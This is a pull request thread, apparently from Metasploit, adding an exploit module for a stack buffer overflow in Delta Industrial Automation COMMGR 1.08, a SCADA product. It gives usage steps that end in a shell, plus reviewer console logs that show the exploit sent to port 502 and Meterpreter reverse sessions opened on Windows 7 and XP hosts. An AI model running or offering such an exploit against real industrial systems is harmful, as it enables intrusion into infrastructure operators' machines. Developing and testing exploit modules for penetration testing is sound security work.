### PR TITLE
Exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

### PR DESCRIPTION
**Pull request by hubertwslin**
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.

## Verification

  1. Install Delta Industrial Automation COMMGR 1.08
  2. Start `msfconsole`
  3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
  4. Do ```set RHOST <target_ip>```
  5. Do ```run```
  6. You should get a shell. :)

### CODE REVIEW

**Comment by bcoles** [comment]
LGTM. Does the 502/tcp service provide any method to check the version remotely?

File: modules/exploits/windows/scada/delta_ia_commgr_bof.rb [hunk 1]
```diff
@@ -0,0 +1,75 @@
...
+        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
+        crafted packets. This module has been tested successfully on Delta Electronics Delta
+        Industrial Automation COMMGR 1.08 over
+          Windows XP SP3,
+          Windows 7 SP1, and
+          Windows 8.1.
+      },
+      'Author'         =>
+        [
+          't4rkd3vilz',    # PoC
```
Comment (bcoles) [inline modules/exploits/windows/scada/delta_ia_commgr_bof.rb]: I believe it's traditional to attribute `ZDI` for discovery in instances where the vulnerability was reported anonymously.

```ruby
         'ZDI', # Initial discovery
```

File: modules/exploits/windows/scada/delta_ia_commgr_bof.rb [hunk 2]
```diff
@@ -0,0 +1,75 @@
...
+          'hubertwslin'    # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '44965'],
```
Comment (bcoles) [inline modules/exploits/windows/scada/delta_ia_commgr_bof.rb]:
```ruby
[ 'BID', '104529' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ]
```

File: modules/exploits/windows/scada/delta_ia_commgr_bof.rb (hunk 1 above)
Comment (hubertwslin) [reply modules/exploits/windows/scada/delta_ia_commgr_bof.rb]: No function codes for remote version check in Modbus TCP. See https://en.wikipedia.org/wiki/Modbus#Supported_function_codes.

**Comment by space-r7** [comment]
Tested on Windows 7 and XP

7:

```
msf5 > use exploit/windows/scada/delta_ia_commgr_bof 
msf5 exploit(windows/scada/delta_ia_commgr_bof) > set rhosts 192.168.37.249
rhosts => 192.168.37.249
msf5 exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.249:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.37.249
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.249:49157) at 2018-10-08 09:41:23 -0500

meterpreter > getuid
Server username: WIN-06VQ79MQC0U\some_user
meterpreter > sysinfo
Computer        : WIN-06VQ79MQC0U
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```

XP:

```
msf5 exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.128:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.37.128
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.128:2185) at 2018-10-08 09:50:19 -0500

meterpreter > getuid
Server username: SHELBY-5F6B1249\space
meterpreter > sysinfo
Computer        : SHELBY-5F6B1249
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```

**Comment by space-r7** [comment]
## Release Notes

This adds a stack-based buffer overflow exploit module for Delta Electronics Delta Industrial Automation COMMGR v1.08.

File: modules/exploits/windows/scada/delta_ia_commgr_bof.rb (hunk 2 above)
Comment (wvu-r7) [reply modules/exploits/windows/scada/delta_ia_commgr_bof.rb]: This was not actually resolved. See #10775, which is incomplete.

File: modules/exploits/windows/scada/delta_ia_commgr_bof.rb (hunk 1 above)
Comment (wvu-r7) [reply modules/exploits/windows/scada/delta_ia_commgr_bof.rb]: Unresolved.

**Pull request merged**